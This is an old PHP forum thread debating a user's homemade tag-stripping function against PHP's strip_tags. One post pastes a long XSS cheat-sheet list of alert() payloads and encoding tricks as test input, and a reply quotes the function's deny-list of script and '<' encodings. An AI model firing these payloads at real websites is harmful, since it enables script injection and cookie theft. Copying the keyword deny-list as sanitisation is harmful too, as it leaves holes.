Results 1 to 13 of 13

Thread: Secure function for Strip tags! - Download

  1. Nov 5th, 2008, 11:18 AM #1
    Y.P.Y
    Y.P.Y is offline

    Thread Starter
    Lively Member Y.P.Y's Avatar
    Join Date
    Sep 2008
    Location
    Tehran - Iran
    Posts
    88

    Lightbulb _______________

    ______________________
    Last edited by Y.P.Y; Apr 28th, 2012 at 05:11 PM.
    Reply With Quote Reply With Quote
  2. Nov 5th, 2008, 12:13 PM #2
    the182guy
    the182guy is offline
    Frenzied Member the182guy's Avatar
    Join Date
    Nov 2005
    Location
    Cheshire, UK
    Posts
    1,473

    Re: Secure function for Strip tags! - Download

    Another one here.
    Chris
    Reply With Quote Reply With Quote
  3. Nov 5th, 2008, 12:31 PM #3
    Y.P.Y
    Y.P.Y is offline

    Thread Starter
    Lively Member Y.P.Y's Avatar
    Join Date
    Sep 2008
    Location
    Tehran - Iran
    Posts
    88

    Re: Secure function for Strip tags! - Download

    No, is not secure! Dont use. http://uk.php.net/manual/en/function...tags.php#86463
    Last edited by Y.P.Y; Nov 5th, 2008 at 12:55 PM.
    Reply With Quote Reply With Quote
  4. Nov 5th, 2008, 12:47 PM #4
    the182guy
    the182guy is offline
    Frenzied Member the182guy's Avatar
    Join Date
    Nov 2005
    Location
    Cheshire, UK
    Posts
    1,473

    Re: Secure function for Strip tags! - Download

    Why is it not secure?

    According to this the strip_tags vulnerability was fixed in CVS in 2004.
    Chris
    Reply With Quote Reply With Quote
  6. Nov 5th, 2008, 01:30 PM #5
    kfcSmitty
    kfcSmitty is offline
    PowerPoster kfcSmitty's Avatar
    Join Date
    May 2005
    Posts
    2,248

    Re: Secure function for Strip tags! - Download

    The only vulnerability I could find is listed here:

    http://www.net-security.org/vuln.php?id=3570

    And it has been fixed since then. What vulnerability are you talking about, Y.P.Y?
    Reply With Quote Reply With Quote
  7. Nov 5th, 2008, 07:07 PM #6
    dclamp
    dclamp is offline
    WiggleWiggle dclamp's Avatar
    Join Date
    Aug 2006
    Posts
    3,527

    Re: Secure function for Strip tags! - Download

    Quote Originally Posted by Y.P.Y
    No, is not secure! Dont use. http://uk.php.net/manual/en/function...tags.php#86463
    This function works fine, The person who posted that note obviouly did something wrong.

    it works perfectly fine for me

    http://subsoft.net/personal/strip_tags.phps [Script File]
    http://subsoft.net/personal/strip_tags.php

    PHP Code:
    <?php
    // a single very long <param> tag
    $html =<<<EOF
    <param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
    ...[snip]...
    vie%20of%20All-Time"/>
    EOF;

    echo     strip_tags($html'<param>');
    // this outputs an empty string
    ?>
    outputs:
    HTML Code:
    <param name="flashVars" value="skin=http%3A//cdn-i.dmdentertainm
...[snip]...
vie%20of%20All-Time"/>
    My usual boring signature: Something
    Reply With Quote Reply With Quote
  8. Nov 6th, 2008, 04:44 AM #7
    I_Love_My_Vans
    I_Love_My_Vans is offline
    Frenzied Member I_Love_My_Vans's Avatar
    Join Date
    Jan 2005
    Location
    In the PHP compiler
    Posts
    1,275

    Re: Secure function for Strip tags! - Download

    Another attempt by Y.P.Y to take over the world with unindented PHP code.

    I agree with everyone else, it would appear any vulnerabilities were fixed long ago...


    ...however, keep going, and keep learning.
    Reply With Quote Reply With Quote
  9. Nov 6th, 2008, 06:13 AM #8
    Y.P.Y
    Y.P.Y is offline

    Thread Starter
    Lively Member Y.P.Y's Avatar
    Join Date
    Sep 2008
    Location
    Tehran - Iran
    Posts
    88

    Re: Secure function for Strip tags! - Download

    Check with this value:
    [CODE]
    <script>alert(document.cookie)</script>
    <IMG SRC="javascript:alert("XSS");">
    <IMG SRC=javascript:alert("XSS")>
    <IMG SRC=JaVaScRiPt:alert("XSS")>
    <IMG SRC=javascript:alert(&quot;XSS&quot>
    <IMG SRC=`javascript:alert("XSS")`>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; &#39;&#88;&#83;&#83;&#39;&#41;>
    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000 058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#00000 39&#0000041>
    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58& #x53&#x53&#x27&#x29>
    <IMG SRC="jav ascript:alert("XSS");">
    <IMG SRC="jav&#x09;ascript:alert("XSS");">
    <IMG SRC="jav&#x0A;ascript:alert("XSS");">
    <IMG SRC="jav&#x0D;ascript:alert("XSS");">
    <IMG
    SRC
    =
    "
    j
    a
    v
    a
    s
    c
    r
    i
    p
    t
    :
    a
    l
    e
    r
    t
    (
    "
    X
    S
    S
    "
    )
    "
    >
    <IMG SRC="  javascript:alert("XSS");">
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
    <<SCRIPT>alert("XSS");//<</SCRIPT>
    <IMG SRC="javascript:alert("XSS")"
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <SCRIPT>a=/XSS/
    alert(a.source)</SCRIPT>
    </TITLE><SCRIPT>alert("XSS");</SCRIPT>
    <INPUT TYPE="IMAGE" SRC="javascript:alert("XSS");">
    <BODY BACKGROUND="javascript:alert("XSS")">
    <BODY ONLOAD=alert("XSS")>
    <IMG DYNSRC="javascript:alert("XSS")">
    <IMG LOWSRC="javascript:alert("XSS")">
    <BGSOUND SRC="javascript:alert("XSS");">
    <BR SIZE="&{alert("XSS")}">
    <LINK REL="stylesheet" HREF="javascript:alert("XSS");">
    <XSS STYLE="behavior: url(xss.htc);">
    <STYLE>li {list-style-image: url("javascript:alert("XSS")");}</STYLE><UL><LI>XSS
    <IMG SRC="vbscript:msgbox("XSS")">
    <IMG SRC="mocha:[code]">
    <IMG SRC="livescript:
    Code:
    ">

?script?alert(?XSS?)?/script?
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert("XSS");">
<IFRAME SRC="javascript:alert("XSS");"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert("XSS");"></FRAMESET>
<TABLE BACKGROUND="javascript:alert("XSS")">
<TABLE><TD BACKGROUND="javascript:alert("XSS")">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="background-image:\0075\0072\006C\0028"\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029"\0029">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="width: expression(alert("XSS"));">
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert("XSS"))">
<XSS STYLE="xss:expression(alert("XSS"))">
exp/*<A STYLE="no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))">
<STYLE>.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE>
<SCRIPT>alert("XSS");</SCRIPT>
<BASE HREF="javascript:alert("XSS");//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert("XSS")></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(\"";
c="javascript:";
d="alert("XSS");\")";
eval(a+b+c+d);
<HTML xmlns:xss>
<xss:xss>XSS</xss:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert("XSS");">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert("XSS")"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
<? echo("<SCR)";
echo("IPT>alert("XSS")</SCRIPT>"); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert("XSS");+ADw-/SCRIPT+AD4-
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
    Reply With Quote Reply With Quote
  11. Nov 6th, 2008, 07:43 AM #9
    I_Love_My_Vans
    I_Love_My_Vans is offline
    Frenzied Member I_Love_My_Vans's Avatar
    Join Date
    Jan 2005
    Location
    In the PHP compiler
    Posts
    1,275

    Re: Secure function for Strip tags! - Download

    ...I think you broke the internet, you might need to amend your code tags...
    Reply With Quote Reply With Quote
  12. Nov 6th, 2008, 09:29 AM #10
    kfcSmitty
    kfcSmitty is offline
    PowerPoster kfcSmitty's Avatar
    Join Date
    May 2005
    Posts
    2,248

    Re: Secure function for Strip tags! - Download

    Yours trims out too much. It also doesn't have the ability to omit tags in the replace.

    For example, if I was echoing something without the tags, I may want my code properly aligned in the background.

    echo _Strip_Tag("<s\0\0cript>\n\ntesting");
    echo strip_tags("<script>\n\ntesting<s\0cript>");

    Your function will strip out the newline character, whereas the real strip_tags allows it.
    Reply With Quote Reply With Quote
  13. Nov 6th, 2008, 02:51 PM #11
    dclamp
    dclamp is offline
    WiggleWiggle dclamp's Avatar
    Join Date
    Aug 2006
    Posts
    3,527

    Re: Secure function for Strip tags! - Download

    @ YPY: The strip tags function is meant to strip tags, not to remove harmful javascript...
    My usual boring signature: Something
    Reply With Quote Reply With Quote
  14. Nov 6th, 2008, 04:40 PM #12
    Y.P.Y
    Y.P.Y is offline

    Thread Starter
    Lively Member Y.P.Y's Avatar
    Join Date
    Sep 2008
    Location
    Tehran - Iran
    Posts
    88

    Re: Secure function for Strip tags! - Download

    Tag is all. Javascipt, HTML, VBScript...
    Reply With Quote Reply With Quote
  15. Nov 6th, 2008, 05:30 PM #13
    visualAd
    visualAd is offline
    VBA Nutter visualAd's Avatar
    Join Date
    Apr 2002
    Location
    Ickenham, UK
    Posts
    4,906

    Re: Secure function for Strip tags! - Download

    Please, please invest some of your heard earned money in a "Beginning PHP 5" book.
    PHP Code:
    function _Strip_Tag($Str_Input)
    {
    @    settype($Str_Input'string'); ///// no need to do this and no need to prefix it with the error supression operator

    $Str_Input= @strip_tags($Str_Input); //// again why are you using the error suspression operator?

    // where did you get these from the hexadecimal numbers are not even valid
    // HTML entities. The script tags would have been removed by strip tags as would the comments
    $_Ary_TagsList= array('jav&#x0A;ascript:''jav&#x0D;ascript:''jav&#x09;ascript:''JaVaScRiPt:''JAVASCRIPT:''<script>''<SCRIPT>''<script >''<noscript>''</script>''<!-''<''>''%3C''&lt''&lt;''&LT''&LT;''&#60''&#060''&#0060''&#00060''&#000060''&#0000060''<''<''<''<''<''<''&#x3c''&#x03c''&#x003c''&#x0003c''&#x00003c''&#x000003c''&#x3c;''&#x03c;''&#x003c;''&#x0003c;''&#x00003c;''&#x000003c;''&#X3c''&#X03c''&#X003c''&#X0003c''&#X00003c''&#X000003c''&#X3c;''&#X03c;''&#X003c;''&#X0003c;''&#X00003c;''&#X000003c;''&#x3C''&#x03C''&#x003C''&#x0003C''&#x00003C''&#x000003C''&#x3C;''&#x03C;''&#x003C;''&#x0003C;''&#x00003C;''&#x000003C;''&#X3C''&#X03C''&#X003C''&#X0003C''&#X00003C''&#X000003C''&#X3C;''&#X03C;''&#X003C;''&#X0003C;''&#X00003C;''&#X000003C;''\x3c''\x3C''\u003c''\u003C'chr(60), chr(62));
    $Str_Input= @str_replace($_Ary_TagsList''$Str_Input);

    // i've never seen anything so pointless in my life - what does this do 
    // except remove two new lines?
    $Str_Input= @str_replace('

    '    ''$Str_Input);

    // it was a string in the first place, why try and cast it back to a string?
    return((string)$Str_Input);

    PHP || MySql || Apache || Get Firefox || OpenOffice.org || Click || Slap ILMV || 1337 c0d || GotoMyPc For FREE! Part 1, Part 2

    | PHP Session --> Database Handler * Custom Error Handler * Installing PHP * HTML Form Handler * PHP 5 OOP * Using XML * Ajax * Xslt | VB6 Winsock - HTTP POST / GET * Winsock - HTTP File Upload

    Latest quote: crptcblade - VB6 executables can't be decompiled, only disassembled. And the disassembled code is even less useful than I am.

    Random VisualAd: Blog - Latest Post: When the Internet becomes Electricity!!

    Spread happiness and joy. Rate good posts.
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Forum Rules


Click Here to Expand Forum to Full Width